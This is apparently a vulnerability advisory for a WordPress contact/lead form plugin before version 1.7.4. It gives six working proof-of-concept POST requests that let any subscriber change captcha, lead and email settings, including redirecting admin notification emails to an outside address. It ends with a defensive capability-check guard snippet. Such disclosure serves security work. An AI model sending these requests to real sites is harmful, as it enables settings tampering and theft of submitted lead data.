WordPress Plugin Vulnerabilities

Contact Form & Lead Form Elementor Builder Plugin < 1.7.4 - Multiple Subscriber+ Settings Update

Description

The plugin doesn't have authorisation and nonce checks, which could allow any authenticated user, such as a subscriber, to update and change various settings.

Proof of Concept

PoC POST Request (ON/OFF Captcha):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

captcha-on-off-setting=ON&captcha_on_off_form_id=2&action=SaveCaptchaOption


PoC POST Request (Captcha Settings: Site Key & Secret Key):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

captcha-setting-sitekey=YoruOni&captcha-setting-secret=YoruOni&captcha-keys=1&action=SaveCaptchaSettings


PoC POST Request (Lead Receiving Method):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

data-recieve-method=3&action-lead-setting=1&action=SaveLeadSettings


PoC POST Request (User Email Notifications):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

user_email_setting%5Bfrom%5D=yoruoni%40pm.me&user_email_setting%5Bheader%5D=New+Lead+Received&user_email_setting%5Bsubject%5D=Received+a+lead&user_email_setting%5Bmessage%5D=Form+Submitted+Successfully&user-email-setting-option=OFF&user_email_setting%5Bform-id%5D=1&action=SaveUserEmailSettings


PoC POST Request (Admin Email Notifications):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

email_setting%5Bto%5D=yoruoni%40pm.me&email_setting%5Bmultiple%5D=&email_setting%5Bfrom%5D=admin%40x14.tv&email_setting%5Bheader%5D=New+Lead+Received&email_setting%5Bsubject%5D=Form+Leads&email_setting%5Bmessage%5D=%5Blf-new-form-data%5D&email_setting%5Bform-id%5D=1&action=SaveEmailSettings


PoC POST Request (Remember this Form):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

form_id=1&action=RememberMeThisForm

Affects Plugins

Fixed in 1.7.4
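
A stopgap for sites that cannot update to 1.7.4 immediately, given here as an added example that is not part of the original advisory or the plugin's own code: a must-use plugin that rejects the six AJAX actions from the PoC requests above unless the caller holds an administrative capability. The `lfb_guard_` names, the placement under wp-content/mu-plugins/ and the choice of `manage_options` as the required capability are assumptions.

```php
<?php
/**
 * Plugin Name: Lead Form AJAX capability guard (added example)
 *
 * Assumed location: wp-content/mu-plugins/lfb-ajax-guard.php
 */

// AJAX action names taken from the PoC requests in the advisory.
const LFB_GUARD_ACTIONS = array(
    'SaveCaptchaOption',
    'SaveCaptchaSettings',
    'SaveLeadSettings',
    'SaveUserEmailSettings',
    'SaveEmailSettings',
    'RememberMeThisForm',
);

/**
 * Stop the request before the vulnerable handler runs.
 * Assumption: these settings are intended for administrators only,
 * so 'manage_options' is used as the required capability.
 */
function lfb_guard_require_admin() {
    if ( ! current_user_can( 'manage_options' ) ) {
        // Sends a JSON error with HTTP 403 and terminates the request.
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }
}

foreach ( LFB_GUARD_ACTIONS as $lfb_guard_action ) {
    // wp_ajax_{action} fires for logged-in users only, which matches the
    // "any authenticated user" condition in the PoC. PHP_INT_MIN makes the
    // guard run ahead of the plugin's own callback on the same hook.
    add_action( "wp_ajax_{$lfb_guard_action}", 'lfb_guard_require_admin', PHP_INT_MIN );
}
```

The guard covers only the missing authorisation check; it does not add the missing nonce check, so updating to the fixed version remains the actual remedy.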

Classification

Type
NO AUTHORISATION
CWE

Miscellaneous

Original Researcher
Yoru Oni
Submitter
Yoru Oni
Verified
Yes

Timeline

Publicly Published
2022-02-01
Added
2022-02-01
Last Updated
2022-04-13